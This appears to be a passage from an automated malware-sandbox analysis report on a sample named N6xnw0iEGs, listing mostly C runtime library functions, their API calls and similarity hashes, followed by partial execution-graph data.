                                          • Instruction Fuzzy Hash: 6F1198769047159BEB22EF749C4474E3B95EF452E5B21C526FC089E191DF34D8C186D0
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,10002554,00000001,00000000,00000000,?,?,100016A6,?,00000004,10002554), ref: 1000A36B
                                          • _free.LIBCMT ref: 1000A37E
                                          • GetLastError.KERNEL32(?,?,100016A6,?,00000004,10002554), ref: 1000A386
                                          • SysAllocString.OLEAUT32(00000000), ref: 1000A3A1
                                          • _free.LIBCMT ref: 1000A3B2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: _free$AllocByteCharErrorLastMultiStringWide
                                          • String ID:
                                          • API String ID: 3133011222-0
                                          • Opcode ID: c488acb78da72a3a34422de2c23df641aa98084b8b09471c2be350180f227cc0
                                          • Instruction ID: 2077ca9f4d592fb9d393f88bccc68470f0d953868ed846a2b40838c90a075a67
                                          • Opcode Fuzzy Hash: c488acb78da72a3a34422de2c23df641aa98084b8b09471c2be350180f227cc0
                                          • Instruction Fuzzy Hash: 1311C676E00205ABF714DB648C86B9EB764FF4A2E1F114339FD0AB3245EA35F9C08651
                                          APIs
                                          • __CreateFrameInfo.LIBCMT ref: 042A060A
                                            • Part of subcall function 0429C1DF: __getptd.LIBCMT ref: 0429C1ED
                                            • Part of subcall function 0429C1DF: __getptd.LIBCMT ref: 0429C1FB
                                          • __getptd.LIBCMT ref: 042A0614
                                            • Part of subcall function 0429E1CD: __getptd_noexit.LIBCMT ref: 0429E1D0
                                            • Part of subcall function 0429E1CD: __amsg_exit.LIBCMT ref: 0429E1DD
                                          • __getptd.LIBCMT ref: 042A0622
                                          • __getptd.LIBCMT ref: 042A0630
                                          • __getptd.LIBCMT ref: 042A063B
                                            • Part of subcall function 0429C284: __CallSettingFrame@12.LIBCMT ref: 0429C2D0
                                            • Part of subcall function 042A0708: __getptd.LIBCMT ref: 042A0717
                                            • Part of subcall function 042A0708: __getptd.LIBCMT ref: 042A0725
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                          • String ID:
                                          • API String ID: 3282538202-0
                                          • Opcode ID: 43978e9da0236b2e924cdff27665abc79311dcc5b447c9cbdae3fa86f6dc4ecd
                                          • Instruction ID: 6133270c6f33a0206113f1f9fe9c3210bd75c7dc6d39a65a25a8662f7b38c987
                                          • Opcode Fuzzy Hash: 43978e9da0236b2e924cdff27665abc79311dcc5b447c9cbdae3fa86f6dc4ecd
                                          • Instruction Fuzzy Hash: 2A11C6B1E102099FEF00EFA4C844BAD7BF1FF04318F118469E854AB290DB38AE159F50
                                          APIs
                                          • __CreateFrameInfo.LIBCMT ref: 10010606
                                            • Part of subcall function 1000C1DB: __getptd.LIBCMT ref: 1000C1E9
                                            • Part of subcall function 1000C1DB: __getptd.LIBCMT ref: 1000C1F7
                                          • __getptd.LIBCMT ref: 10010610
                                            • Part of subcall function 1000E1C9: __getptd_noexit.LIBCMT ref: 1000E1CC
                                            • Part of subcall function 1000E1C9: __amsg_exit.LIBCMT ref: 1000E1D9
                                          • __getptd.LIBCMT ref: 1001061E
                                          • __getptd.LIBCMT ref: 1001062C
                                          • __getptd.LIBCMT ref: 10010637
                                            • Part of subcall function 1000C280: __CallSettingFrame@12.LIBCMT ref: 1000C2CC
                                            • Part of subcall function 10010704: __getptd.LIBCMT ref: 10010713
                                            • Part of subcall function 10010704: __getptd.LIBCMT ref: 10010721
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                          • String ID:
                                          • API String ID: 3282538202-0
                                          • Opcode ID: 43978e9da0236b2e924cdff27665abc79311dcc5b447c9cbdae3fa86f6dc4ecd
                                          • Instruction ID: a34a26c94cea6deafa8c9f36bd2a728e31c5b09b861303a45c5e6187363f670b
                                          • Opcode Fuzzy Hash: 43978e9da0236b2e924cdff27665abc79311dcc5b447c9cbdae3fa86f6dc4ecd
                                          • Instruction Fuzzy Hash: 661119B5D00249DFEF00DFA4D845AED7BB0FF08314F10846AF814AB256DB38AA559F50
                                          APIs
                                          • GetModuleHandleW.KERNEL32(100179E4,1001C2A0,00000008,0429E1A8,00000000,00000000,?,?,?,?,042913CC,?,?,?), ref: 0429E0B1
                                          • __lock.LIBCMT ref: 0429E0E5
                                            • Part of subcall function 0429EF96: __amsg_exit.LIBCMT ref: 0429EFB8
                                            • Part of subcall function 0429EF96: RtlEnterCriticalSection.NTDLL(?), ref: 0429EFC0
                                          • InterlockedIncrement.KERNEL32(1001F248), ref: 0429E0F2
                                          • __lock.LIBCMT ref: 0429E106
                                          • ___addlocaleref.LIBCMT ref: 0429E124
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit
                                          • String ID:
                                          • API String ID: 3732598078-0
                                          • Opcode ID: 70b4e6b8f78dcc84af0e7df263b7b89caa54c413800e79653d44e23eabc2e176
                                          • Instruction ID: 5734aa9ab69a31a5b1a3be2097fa391f92f18279766909e4683cd12e43a5db54
                                          • Opcode Fuzzy Hash: 70b4e6b8f78dcc84af0e7df263b7b89caa54c413800e79653d44e23eabc2e176
                                          • Instruction Fuzzy Hash: D0010571614B41ABEB20EF69C844759BBE0BF10325F11890EE49A5B7E0CBB4EA84CB11
                                          APIs
                                          • GetModuleHandleW.KERNEL32(100179E4,1001C2A0,00000008,1000E1A4,00000000,00000000,?,?,?,?,100013C8,?,?,?), ref: 1000E0AD
                                          • __lock.LIBCMT ref: 1000E0E1
                                            • Part of subcall function 1000EF92: __mtinitlocknum.LIBCMT ref: 1000EFA8
                                            • Part of subcall function 1000EF92: __amsg_exit.LIBCMT ref: 1000EFB4
                                            • Part of subcall function 1000EF92: RtlEnterCriticalSection.NTDLL(?), ref: 1000EFBC
                                          • InterlockedIncrement.KERNEL32(1001F248), ref: 1000E0EE
                                          • __lock.LIBCMT ref: 1000E102
                                          • ___addlocaleref.LIBCMT ref: 1000E120
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                          • String ID:
                                          • API String ID: 637971194-0
                                          • Opcode ID: 70b4e6b8f78dcc84af0e7df263b7b89caa54c413800e79653d44e23eabc2e176
                                          • Instruction ID: 9a48f909f7989934b9c459eb75a3addc35068ef0a3d0d7f40ba30f9e57b30fd9
                                          • Opcode Fuzzy Hash: 70b4e6b8f78dcc84af0e7df263b7b89caa54c413800e79653d44e23eabc2e176
                                          • Instruction Fuzzy Hash: BB015B75400B41AFF320DF69D846759BBE0FF10351F10890EE49AAB2A1CBB4FA80CB11
                                          APIs
                                          • __getptd.LIBCMT ref: 0429DFB0
                                            • Part of subcall function 0429E1CD: __getptd_noexit.LIBCMT ref: 0429E1D0
                                            • Part of subcall function 0429E1CD: __amsg_exit.LIBCMT ref: 0429E1DD
                                          • __getptd.LIBCMT ref: 0429DFC7
                                          • __amsg_exit.LIBCMT ref: 0429DFD5
                                          • __lock.LIBCMT ref: 0429DFE5
                                          • __updatetlocinfoEx_nolock.LIBCMT ref: 0429DFF9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                          • String ID:
                                          • API String ID: 938513278-0
                                          • Opcode ID: 42c2f6527bd4046be4e14d4fef5b049670ef4ff3068ca2e77a2d90ff3d443448
                                          • Instruction ID: 48e8608dc55bd058711f470af8682a94fb2e8538540507a9e37a0439c36d9ac1
                                          • Opcode Fuzzy Hash: 42c2f6527bd4046be4e14d4fef5b049670ef4ff3068ca2e77a2d90ff3d443448
                                          • Instruction Fuzzy Hash: B2F09032B38611AAFF20FFB49806B5937E1AF00329F124109D054AB2D0CBB4BC40BA56
                                          APIs
                                          • __getptd.LIBCMT ref: 1000DFAC
                                            • Part of subcall function 1000E1C9: __getptd_noexit.LIBCMT ref: 1000E1CC
                                            • Part of subcall function 1000E1C9: __amsg_exit.LIBCMT ref: 1000E1D9
                                          • __getptd.LIBCMT ref: 1000DFC3
                                          • __amsg_exit.LIBCMT ref: 1000DFD1
                                          • __lock.LIBCMT ref: 1000DFE1
                                          • __updatetlocinfoEx_nolock.LIBCMT ref: 1000DFF5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                          • String ID:
                                          • API String ID: 938513278-0
                                          • Opcode ID: 42c2f6527bd4046be4e14d4fef5b049670ef4ff3068ca2e77a2d90ff3d443448
                                          • Instruction ID: f20503e91f1c088b6fa6549a6e33c434a8d9a84f450c806c27e01d97e1020dc2
                                          • Opcode Fuzzy Hash: 42c2f6527bd4046be4e14d4fef5b049670ef4ff3068ca2e77a2d90ff3d443448
                                          • Instruction Fuzzy Hash: E3F090369486919BF751FBA46807B6D37E1EF003E0F11811AF406BA1DACB34AD409A66
                                          APIs
                                          • ___BuildCatchObject.LIBCMT ref: 042A09A2
                                            • Part of subcall function 042A08FD: ___BuildCatchObjectHelper.LIBCMT ref: 042A0933
                                          • _UnwindNestedFrames.LIBCMT ref: 042A09B9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: BuildCatchObject$FramesHelperNestedUnwind
                                          • String ID: csm$csm
                                          • API String ID: 3487967840-3733052814
                                          • Opcode ID: 2c433eeadeeff05f0d38dc95483bda366b925a4b7ec49010a466325f946cd4e4
                                          • Instruction ID: c08a7425d974040af4d4cba042ab3f1f7a166202036e0e7951f8e8249523e7a6
                                          • Opcode Fuzzy Hash: 2c433eeadeeff05f0d38dc95483bda366b925a4b7ec49010a466325f946cd4e4
                                          • Instruction Fuzzy Hash: CA01E43122020ABFEF12AE51CC44EAA7F6AFF19794F104011BE5815120D776E9B1DBA9
                                          APIs
                                          • ___BuildCatchObject.LIBCMT ref: 1001099E
                                            • Part of subcall function 100108F9: ___BuildCatchObjectHelper.LIBCMT ref: 1001092F
                                          • _UnwindNestedFrames.LIBCMT ref: 100109B5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: BuildCatchObject$FramesHelperNestedUnwind
                                          • String ID: csm$csm
                                          • API String ID: 3487967840-3733052814
                                          • Opcode ID: 2c433eeadeeff05f0d38dc95483bda366b925a4b7ec49010a466325f946cd4e4
                                          • Instruction ID: 14b1107ce5288ea1db0b61008beba539b652f12cac3eb1ffe8717002ad162d0f
                                          • Opcode Fuzzy Hash: 2c433eeadeeff05f0d38dc95483bda366b925a4b7ec49010a466325f946cd4e4
                                          • Instruction Fuzzy Hash: 6701E87550150ABBEF12DF51CC45EAB7E6AEF08390F104010BD9859121DBB2E9A1DBA1
                                          APIs
                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 042A421D
                                          • __isleadbyte_l.LIBCMT ref: 042A4250
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,0429A58F,?,00000000,00000000,?,?,?,?,0429A58F,00000000), ref: 042A4281
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,0429A58F,00000001,00000000,00000000,?,?,?,?,0429A58F,00000000), ref: 042A42EF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                          • String ID:
                                          • API String ID: 3058430110-0
                                          • Opcode ID: a2e5321d14d881ead6f0bd83a25f131926bda11b861c1382244b0588a3a2ffb7
                                          • Instruction ID: 5333566ef286df49393a7251ecfe12360bb66b5ec12ac67030194ee82339239a
                                          • Opcode Fuzzy Hash: a2e5321d14d881ead6f0bd83a25f131926bda11b861c1382244b0588a3a2ffb7
                                          • Instruction Fuzzy Hash: 3C31E731B20256EFEF20EFA4C884DBD3BB5BF05318F0545A9E8549B191DBB0E961DB50
                                          APIs
                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 10014219
                                          • __isleadbyte_l.LIBCMT ref: 1001424C
                                          • MultiByteToWideChar.KERNEL32(39858D00,00000009,?,C4830000,?,00000000,?,?,?,100013C8,?,grams), ref: 1001427D
                                          • MultiByteToWideChar.KERNEL32(39858D00,00000009,?,00000001,?,00000000,?,?,?,100013C8,?,grams), ref: 100142EB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                          • String ID:
                                          • API String ID: 3058430110-0
                                          • Opcode ID: 66a403b29b51960a59580dd5e22c56c14a98226dd1bf7eee6dd0b04d3ec89fb9
                                          • Instruction ID: 9a2e08e8898311d7942999ee4248f65e9f85b56d768c46727ef472f1acbeff64
                                          • Opcode Fuzzy Hash: 66a403b29b51960a59580dd5e22c56c14a98226dd1bf7eee6dd0b04d3ec89fb9
                                          • Instruction Fuzzy Hash: 0C318931A00296EFDB10DFA4C884AAE7BF5FF05251B5685A9F4649F1A1EB30D9C0DB50
                                          APIs
                                          • _malloc.LIBCMT ref: 042A37B8
                                            • Part of subcall function 0429AC8F: __FF_MSGBANNER.LIBCMT ref: 0429ACA8
                                            • Part of subcall function 0429AC8F: __NMSG_WRITE.LIBCMT ref: 0429ACAF
                                            • Part of subcall function 0429AC8F: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 0429ACD4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: AllocateHeap_malloc
                                          • String ID:
                                          • API String ID: 501242067-0
                                          • Opcode ID: 71f90c1d93d3610ed76ff0871fb3a3774855346611b6f30d5e51d5061c84d089
                                          • Instruction ID: 81b1becdfe518feb54d6b8738fe777cfaaf380fe9fe529e2e0d946d5aea94064
                                          • Opcode Fuzzy Hash: 71f90c1d93d3610ed76ff0871fb3a3774855346611b6f30d5e51d5061c84d089
                                          • Instruction Fuzzy Hash: 4811C872730311AFEF21AF749C046593BE5BF443A8B204029FC098A590EA34FC51D791
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                          • String ID:
                                          • API String ID: 3016257755-0
                                          • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                          • Instruction ID: 78f06cdb82fbe453eaf0c22657e0650a4b21dc56bcd6adf89ae4d4ea71f074b2
                                          • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                          • Instruction Fuzzy Hash: 71117B3266014ABBCF125E84CC018FE3F22BF19365F188615FE5859031D232E5B1EB81
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                          • String ID:
                                          • API String ID: 3016257755-0
                                          • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                          • Instruction ID: b2deb5109e3459db6c2e92c86942fb6d1a7187026451c9960ed85992b78a3838
                                          • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                          • Instruction Fuzzy Hash: 0711523640514EBBCF569E84DC41CEE3F62FF08294B558515FE2959031C737DAB2AB82
                                          APIs
                                          • _malloc.LIBCMT ref: 0429B4E6
                                            • Part of subcall function 0429AC8F: __FF_MSGBANNER.LIBCMT ref: 0429ACA8
                                            • Part of subcall function 0429AC8F: __NMSG_WRITE.LIBCMT ref: 0429ACAF
                                            • Part of subcall function 0429AC8F: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 0429ACD4
                                          • std::exception::exception.LIBCMT ref: 0429B51B
                                          • std::exception::exception.LIBCMT ref: 0429B535
                                          • __CxxThrowException@8.LIBCMT ref: 0429B546
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                          • String ID:
                                          • API String ID: 615853336-0
                                          • Opcode ID: e5c4b8db9ad2f9204201c840d5c8d85f97d53c1a96168afad4049c9aba9b0e4e
                                          • Instruction ID: 928348326ef8a615e40e1e80118f45af1491790ebecd2f8676413f0ab40277a4
                                          • Opcode Fuzzy Hash: e5c4b8db9ad2f9204201c840d5c8d85f97d53c1a96168afad4049c9aba9b0e4e
                                          • Instruction Fuzzy Hash: 73F0F43062035AABEF10EB94EC989AD3FFAFF40718F500059F505AA090DB74FE468740
                                          APIs
                                          • __getptd.LIBCMT ref: 042A0717
                                            • Part of subcall function 0429E1CD: __getptd_noexit.LIBCMT ref: 0429E1D0
                                            • Part of subcall function 0429E1CD: __amsg_exit.LIBCMT ref: 0429E1DD
                                          • __getptd.LIBCMT ref: 042A0725
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Offset: 04290000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4290000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: __getptd$__amsg_exit__getptd_noexit
                                          • String ID: csm
                                          • API String ID: 803148776-1018135373
                                          • Opcode ID: f9f64d09b4068a58e2e8f065dc4f033a2b689a0011f903776a6ee69fe6737778
                                          • Instruction ID: e5655a72efa9266c5b66d472dddafca3de6abd4c7057a1ba0f5d0cf50569e784
                                          • Opcode Fuzzy Hash: f9f64d09b4068a58e2e8f065dc4f033a2b689a0011f903776a6ee69fe6737778
                                          • Instruction Fuzzy Hash: 61012434A20206CBDF38DF65C840BACB7F5AF00355F6849AED880A6690CB30BDA4DE41
                                          APIs
                                          • __getptd.LIBCMT ref: 10010713
                                            • Part of subcall function 1000E1C9: __getptd_noexit.LIBCMT ref: 1000E1CC
                                            • Part of subcall function 1000E1C9: __amsg_exit.LIBCMT ref: 1000E1D9
                                          • __getptd.LIBCMT ref: 10010721
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: __getptd$__amsg_exit__getptd_noexit
                                          • String ID: csm
                                          • API String ID: 803148776-1018135373
                                          • Opcode ID: f9f64d09b4068a58e2e8f065dc4f033a2b689a0011f903776a6ee69fe6737778
                                          • Instruction ID: 69e9575505c20a4c0929deabb4f4008ee8848d00d0d14bc8a6ce3e821bcd4481
                                          • Opcode Fuzzy Hash: f9f64d09b4068a58e2e8f065dc4f033a2b689a0011f903776a6ee69fe6737778
                                          • Instruction Fuzzy Hash: E5012838E053059EDB24CF61D854A9DB7F5EF04391F21492EF4819A695CBB0EDC4DE41

                                          Execution Graph

                                          Execution Coverage:3.2%
                                          Dynamic/Decrypted Code Coverage:0.9%
                                          Signature Coverage:0%
                                          Total number of Nodes:934
                                          Total number of Limit Nodes:26
                                          execution_graph 109970 2f032d0 6 API calls 109971 6c35bca4 109973 6c35bcb0 109971->109973 109972 6c3d1f84 98 API calls _sprintf 109972->109973 109973->109972 109977 6c35bfa9 109973->109977 109981 6c3a0679 109973->109981 109996 6c370b5b 62 API calls __floor_pentium4 109973->109996 109997 6c3f6d20 62 API calls 109973->109997 109998 6c3a0847 148 API calls 2 library calls 109973->109998 109999 6c3d1f75 109977->109999 109979 6c35bfb6 109982 6c3a06a3 109981->109982 110007 6c39f7da 109982->110007 109986 6c3a0798 109987 6c3d1f75 __input_s_l 5 API calls 109986->109987 109989 6c3a07c2 109987->109989 109988 6c3a06b7 109988->109986 109990 6c3a072e 109988->109990 109991 6c3a0741 109988->109991 109994 6c3a06fe 109988->109994 109989->109973 110086 6c39f3fb 101 API calls 3 library calls 109990->110086 110087 6c3a0238 101 API calls 5 library calls 109991->110087 109994->109986 110034 6c39faa9 109994->110034 109996->109973 109997->109973 109998->109973 110000 6c3d1f7d 109999->110000 110001 6c3d1f7f IsDebuggerPresent 109999->110001 110000->109979 110532 6c3e103d 110001->110532 110004 6c3d5f09 SetUnhandledExceptionFilter UnhandledExceptionFilter 110005 6c3d5f2e GetCurrentProcess TerminateProcess 110004->110005 110006 6c3d5f26 __call_reportfault 110004->110006 110005->109979 110006->110005 110008 6c39f823 110007->110008 110018 6c39f81b 110007->110018 110009 6c39f861 110008->110009 110088 6c3983bc 110008->110088 110009->110018 110098 6c3d4496 97 API calls 5 library calls 110009->110098 110010 6c3d1f75 __input_s_l 5 API calls 110014 6c39faa4 110010->110014 110026 6c39f2b5 110014->110026 110015 6c3983bc 144 API calls 110015->110009 110017 6c39fa57 110113 6c3d4ae0 62 API calls __input_s_l 110017->110113 110018->110010 110020 6c39f880 __mbschr_l 110020->110017 110020->110018 110020->110020 110024 6c39f33d 65 API calls 110020->110024 110025 6c3a8f22 62 API calls 110020->110025 110099 6c39f3fb 101 API calls 3 library calls 110020->110099 110100 6c3d49b0 81 API calls __tolower_l 110020->110100 110101 6c3d1f84 110020->110101 110112 6c3d3007 77 API calls 5 library calls 110020->110112 110024->110020 110025->110020 110027 6c39f2c8 __mbschr_l _strncpy 110026->110027 110028 6c39f2f1 110027->110028 110434 6c3a8f22 62 API calls 3 library calls 110027->110434 110031 6c39f30f 110028->110031 110435 6c3d49b0 81 API calls __tolower_l 110028->110435 110032 6c3d1f84 _sprintf 98 API calls 110031->110032 110033 6c39f332 110031->110033 110032->110033 110033->109988 110035 6c39faeb 110034->110035 110039 6c39fb88 110035->110039 110444 6c396655 62 API calls 2 library calls 110035->110444 110037 6c39fb40 110040 6c39fb4e _memset 110037->110040 110445 6c3913bf 98 API calls 2 library calls 110037->110445 110042 6c3d1f84 _sprintf 98 API calls 110039->110042 110040->110039 110446 6c3d28b7 98 API calls 5 library calls 110040->110446 110043 6c39fc00 110042->110043 110044 6c39fd0f 110043->110044 110447 6c3a817c 62 API calls 110043->110447 110045 6c39fd5a 110044->110045 110450 6c3a5db6 5 API calls __input_s_l 110044->110450 110048 6c39fde1 110045->110048 110436 6c39726b 110045->110436 110064 6c39fe3c 110048->110064 110083 6c39fdb3 110048->110083 110452 6c3a0e52 145 API calls 110048->110452 110049 6c39fce2 110448 6c3a4712 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 110049->110448 110052 6c39fcf9 110449 6c3a4712 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 110052->110449 110054 6c39fe1b 110054->110083 110453 6c3a0e52 145 API calls 110054->110453 110057 6c39fd2e 110057->110045 110451 6c3a5c0c 62 API calls __input_s_l 110057->110451 110058 6c39726b 146 API calls 110058->110048 110061 6c3d1f75 __input_s_l 5 API calls 110063 6c3a0236 110061->110063 110062 6c39ff40 110069 6c39ff73 110062->110069 110455 6c39a96a 5 API calls __input_s_l 110062->110455 110063->109986 110064->110062 110064->110083 110084 6c39fffc 110064->110084 110454 6c39abd5 5 API calls __input_s_l 110064->110454 110065 6c39ffaf 110065->110084 110457 6c3a4712 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 110065->110457 110069->110065 110456 6c3a5c0c 62 API calls __input_s_l 110069->110456 110071 6c3a012f 110075 6c3a0149 110071->110075 110076 6c3a0136 110071->110076 110072 6c3a00fc 110460 6c399dc8 145 API calls __input_s_l 110072->110460 110073 6c39ffda 110073->110084 110458 6c39a5e7 62 API calls 110073->110458 110074 6c3a003f 110074->110071 110074->110072 110085 6c3a010f 110074->110085 110462 6c3a2e6b 62 API calls __input_s_l 110075->110462 110461 6c399ef2 145 API calls __input_s_l 110076->110461 110083->110061 110083->110083 110084->110074 110459 6c39a73a 5 API calls __input_s_l 110084->110459 110085->110083 110463 6c3a2e6b 62 API calls __input_s_l 110085->110463 110086->109994 110087->109994 110096 6c3983f0 110088->110096 110089 6c398575 110090 6c3d1f84 _sprintf 98 API calls 110089->110090 110091 6c398592 110090->110091 110092 6c3d1f75 __input_s_l 5 API calls 110091->110092 110093 6c3985c8 110092->110093 110093->110009 110093->110015 110094 6c3985ca 110094->110091 110095 6c3d1f84 _sprintf 98 API calls 110094->110095 110095->110091 110096->110089 110096->110091 110096->110094 110114 6c3d24fa 110096->110114 110098->110020 110099->110020 110100->110020 110102 6c3d1fb7 110101->110102 110103 6c3d1fa2 110101->110103 110102->110103 110104 6c3d1fbe 110102->110104 110430 6c3d6fbc 62 API calls __getptd_noexit 110103->110430 110432 6c3d61ad 98 API calls 10 library calls 110104->110432 110106 6c3d1fa7 110431 6c3d6f31 10 API calls __invalid_parameter_noinfo_noreturn 110106->110431 110109 6c3d1fe4 110110 6c3d1fb2 110109->110110 110433 6c3d5f42 93 API calls 5 library calls 110109->110433 110110->110020 110112->110020 110113->110018 110117 6c3d243e 110114->110117 110116 6c3d250c 110116->110096 110119 6c3d244a __fseeki64 110117->110119 110118 6c3d245d 110176 6c3d6fbc 62 API calls __getptd_noexit 110118->110176 110119->110118 110121 6c3d248a 110119->110121 110136 6c3d8289 110121->110136 110122 6c3d2462 110177 6c3d6f31 10 API calls __invalid_parameter_noinfo_noreturn 110122->110177 110125 6c3d248f 110126 6c3d2496 110125->110126 110127 6c3d24a3 110125->110127 110178 6c3d6fbc 62 API calls __getptd_noexit 110126->110178 110129 6c3d24ca 110127->110129 110130 6c3d24aa 110127->110130 110154 6c3d7ff2 110129->110154 110179 6c3d6fbc 62 API calls __getptd_noexit 110130->110179 110134 6c3d246d __fseeki64 @_EH4_CallFilterFunc@8 110134->110116 110137 6c3d8295 __fseeki64 110136->110137 110181 6c3d7fbf 110137->110181 110139 6c3d82a3 110140 6c3d831f 110139->110140 110151 6c3d8318 110139->110151 110191 6c3d7efd 110139->110191 110219 6c3d23a1 63 API calls __lock 110139->110219 110220 6c3d240f LeaveCriticalSection LeaveCriticalSection _doexit 110139->110220 110221 6c3d7a7a 62 API calls _malloc 110140->110221 110143 6c3d8326 110145 6c3d8334 InitializeCriticalSectionAndSpinCount 110143->110145 110143->110151 